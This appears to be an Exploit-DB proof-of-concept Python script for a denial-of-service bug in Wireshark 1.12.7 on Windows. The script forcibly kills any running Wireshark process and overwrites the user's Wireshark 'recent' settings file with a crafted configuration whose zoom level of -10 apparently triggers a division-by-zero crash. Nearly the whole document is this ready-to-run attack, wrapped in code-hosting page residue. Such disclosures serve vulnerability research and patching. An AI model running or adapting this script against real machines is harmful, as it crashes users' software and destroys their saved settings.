137 lines
No EOL
3 KiB
Python
Executable file
137 lines
No EOL
3 KiB
Python
Executable file
# Exploit Title: Wireshark 1.12.7 Division by zero DOS PoC
|
|
# Date: 02/09/2015
|
|
# Exploit Author: spyk <spyk[dot]developpeur[at]gmail[dot]com> @SwanBeaujard
|
|
# Vendor Homepage: https://www.wireshark.org/
|
|
# Software Link: https://www.wireshark.org/download.html
|
|
# Version: 1.12.7
|
|
# Tested on: Windows 7
|
|
# Thanks to my professor @St0rn https://www.exploit-db.com/author/?a=8143
|
|
|
|
import os
|
|
import subprocess
|
|
import getpass
|
|
|
|
drive=os.getenv("systemdrive")
|
|
user=getpass.getuser()
|
|
path="%s\\Users\\%s\\AppData\\Roaming\\Wireshark\\recent" %(drive,user)
|
|
|
|
def wiresharkIsPresent():
|
|
|
|
ps=subprocess.check_output("tasklist")
|
|
|
|
if "Wireshark.exe" in ps:
|
|
|
|
return 1
|
|
|
|
else:
|
|
|
|
return 0
|
|
|
|
|
|
|
|
def killWireshark():
|
|
|
|
try:
|
|
|
|
res=subprocess.check_output("taskkill /F /IM Wireshark.exe /T")
|
|
|
|
return 1
|
|
|
|
except:
|
|
|
|
return 0
|
|
|
|
|
|
|
|
if wiresharkIsPresent():
|
|
|
|
if killWireshark():
|
|
|
|
print "Wireshark is killed!"
|
|
|
|
sploit="""
|
|
# Recent settings file for Wireshark 1.12.7.
|
|
#
|
|
# This file is regenerated each time Wireshark is quit
|
|
# and when changing configuration profile.
|
|
# So be careful, if you want to make manual changes here.
|
|
|
|
|
|
# Main Toolbar show (hide).
|
|
# TRUE or FALSE (case-insensitive).
|
|
gui.toolbar_main_show: TRUE
|
|
|
|
# Filter Toolbar show (hide).
|
|
# TRUE or FALSE (case-insensitive).
|
|
gui.filter_toolbar_show: TRUE
|
|
|
|
# Wireless Settings Toolbar show (hide).
|
|
# TRUE or FALSE (case-insensitive).
|
|
gui.wireless_toolbar_show: FALSE
|
|
|
|
# Show (hide) old AirPcap driver warning dialog box.
|
|
# TRUE or FALSE (case-insensitive).
|
|
gui.airpcap_driver_check_show: TRUE
|
|
|
|
# Packet list show (hide).
|
|
# TRUE or FALSE (case-insensitive).
|
|
gui.packet_list_show: TRUE
|
|
|
|
# Tree view show (hide).
|
|
# TRUE or FALSE (case-insensitive).
|
|
gui.tree_view_show: TRUE
|
|
|
|
# Byte view show (hide).
|
|
# TRUE or FALSE (case-insensitive).
|
|
gui.byte_view_show: TRUE
|
|
|
|
# Statusbar show (hide).
|
|
# TRUE or FALSE (case-insensitive).
|
|
gui.statusbar_show: TRUE
|
|
|
|
# Packet list colorize (hide).
|
|
# TRUE or FALSE (case-insensitive).
|
|
gui.packet_list_colorize: TRUE
|
|
|
|
# Timestamp display format.
|
|
# One of: RELATIVE, ABSOLUTE, ABSOLUTE_WITH_DATE, DELTA, DELTA_DIS, EPOCH, UTC, UTC_WITH_DATE
|
|
gui.time_format: RELATIVE
|
|
|
|
# Timestamp display precision.
|
|
# One of: AUTO, SEC, DSEC, CSEC, MSEC, USEC, NSEC
|
|
gui.time_precision: AUTO
|
|
|
|
# Seconds display format.
|
|
# One of: SECONDS, HOUR_MIN_SEC
|
|
gui.seconds_format: SECONDS
|
|
|
|
# Zoom level.
|
|
# A decimal number.
|
|
gui.zoom_level: -10
|
|
|
|
# Bytes view.
|
|
# A decimal number.
|
|
gui.bytes_view: 0
|
|
|
|
# Main window upper (or leftmost) pane size.
|
|
# Decimal number.
|
|
gui.geometry_main_upper_pane: 440
|
|
|
|
# Main window middle pane size.
|
|
# Decimal number.
|
|
gui.geometry_main_lower_pane: 428
|
|
|
|
# Packet list column pixel widths.
|
|
# Each pair of strings consists of a column format and its pixel width.
|
|
column.width: %m, 59, %t, 84, %s, 154, %d, 154, %p, 56, %L, 48, %i, 1285
|
|
|
|
# Last directory navigated to in File Open dialog.
|
|
gui.fileopen_remembered_dir: """+drive+"""\\Users\\"""+user+"""\\Documents\\
|
|
"""
|
|
try:
|
|
f=open(path,"w")
|
|
f.write(sploit)
|
|
f.close()
|
|
print "Success!"
|
|
except:
|
|
print "Fail :(" |